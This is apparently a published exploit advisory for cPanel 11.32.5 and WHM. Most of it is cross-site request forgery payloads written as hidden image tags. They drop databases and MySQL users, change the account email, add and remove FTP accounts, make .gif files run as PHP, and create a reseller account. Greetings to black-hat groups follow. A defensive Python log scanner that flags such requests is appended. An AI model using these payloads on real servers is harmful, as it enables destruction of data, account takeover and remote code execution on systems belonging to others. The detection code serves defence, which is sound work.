- ==============================================================================
- Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
- Vulnerability: CSRF
- Vendor: cpanel.net
- ==============================================================================
- =====================================================================
- Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
- Aka: Cpanel Accelerated 2
- via
- WHM 11.32.5 (build 11)
- =====================================================================
- CSRF: Drop Database: (Method $_GET)
- <img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />
- Here we are going to drop database named: armenian_music
- =====================================================================
- CSRF: Drop mysql user: (Method $_GET)
- <img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
- Here we are going to drop mysql user named: armenian_adserver ))
- =====================================================================
- CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
- Changing email address to: owned_and_owned_again@gmail.tld
- <img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" heigth="0" width="0" />
- =====================================================================
- CSRF adding FTP account:
- username: akastep
- password: akastep
- host is target host.
- <img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" heigth="0" width="0" />
- =====================================================================
- CSRF Drop FTP account:
- Deletes existent ftp account named: axaxa
- <img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />
- =====================================================================
- CSRF change Apache handler:
- (Parse .gif file as php script)
- <img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
- =====================================================================
- CSRF Delete handler:
- <img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />
- =====================================================================
- WHM 11.32.5 (build 11)
- CSRF: Add Reseller+setup
- with domain: owned.com
- username: owned111
- password: MYVERYSTRONGGOESHERE
- And contact email: owned@owned1.you
- <img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default&quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />
- =====================================================================
- ================================================
- SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
- ================================================
- packetstormsecurity.org
- packetstormsecurity.com
- packetstormsecurity.net
- securityfocus.com
- cxsecurity.com
- security.nnov.ru
- securityvulns.com
- securitylab.ru
- secunia.com
- securityhome.eu
- exploitsdownload.com
- exploit-db.com
- osvdb.com
- websecurity.com.ua
- to all Aa Team + to all Azerbaijan Black HatZ +
- *Especially to my bro CAMOUFL4G3 *
- Also special thanks to: ottoman38 & HERO_AZE
- ================================================
- /AkaStep
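
A defender-side check for the requests listed above, as an added example that is not part of the original advisory: it scans access-log lines for GET requests to the state-changing endpoints named in the advisory whose Referer is missing or points away from the panel host. The combined log format, the host name panel.example.net and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# State-changing endpoints named in the advisory (cPanel :2082, WHM :2086).
SENSITIVE_PATHS = {
    "/frontend/x3/sql/deldb.html", "/frontend/x3/sql/deluser.html",
    "/frontend/x3/contact/saveemail.html", "/frontend/x3/mime/addhandle.html",
    "/frontend/x3/mime/delhandle.html", "/scripts5/wwwacct",
}
SENSITIVE_API_FUNCS = {("Ftp", "addftp"), ("Ftp", "delftp")}

# Assumed layout: host - user [time] "METHOD target PROTO" status size "referer" ...
LINE_RE = re.compile(
    r'^\S+ \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')

def is_sensitive(target):
    """True if the request target is one of the advisory's state-changing calls."""
    url = urlsplit(target)
    if url.path in SENSITIVE_PATHS:
        return True
    if url.path == "/json-api/cpanel":
        q = parse_qs(url.query)
        call = (q.get("cpanel_jsonapi_module", [""])[0],
                q.get("cpanel_jsonapi_func", [""])[0])
        return call in SENSITIVE_API_FUNCS
    return False

def find_csrf_candidates(lines, panel_host):
    """Return (user, path, referer) for sensitive GETs not referred by the panel."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        user, method, target, referer = m.groups()
        if method != "GET" or not is_sensitive(target):
            continue
        # hostname is None for "-" or an empty Referer; that is flagged too,
        # since an embedded <img> on another site may send no Referer at all.
        if urlsplit(referer).hostname != panel_host:
            hits.append((user, urlsplit(target).path, referer))
    return hits

T = "[10/May/2012:10:00:01 +0000]"  # constructed timestamp
SAMPLE = [  # constructed log lines, not taken from a real system
    f'203.0.113.5 - alice {T} "GET /frontend/x3/sql/deldb.html?db=alice_test HTTP/1.1" 200 512 "http://blog.example.org/post" "Mozilla/5.0"',
    f'203.0.113.5 - alice {T} "GET /frontend/x3/sql/deldb.html?db=alice_old HTTP/1.1" 200 512 "http://panel.example.net:2082/frontend/x3/sql/index.html" "Mozilla/5.0"',
    f'203.0.113.5 - alice {T} "GET /json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=x HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    f'203.0.113.5 - alice {T} "GET /frontend/x3/index.html HTTP/1.1" 200 2048 "http://blog.example.org/" "Mozilla/5.0"',
]
```

A hit is only a candidate for review: a Referer header can be stripped by proxies or privacy settings, so the result narrows down log lines rather than proving a forged request.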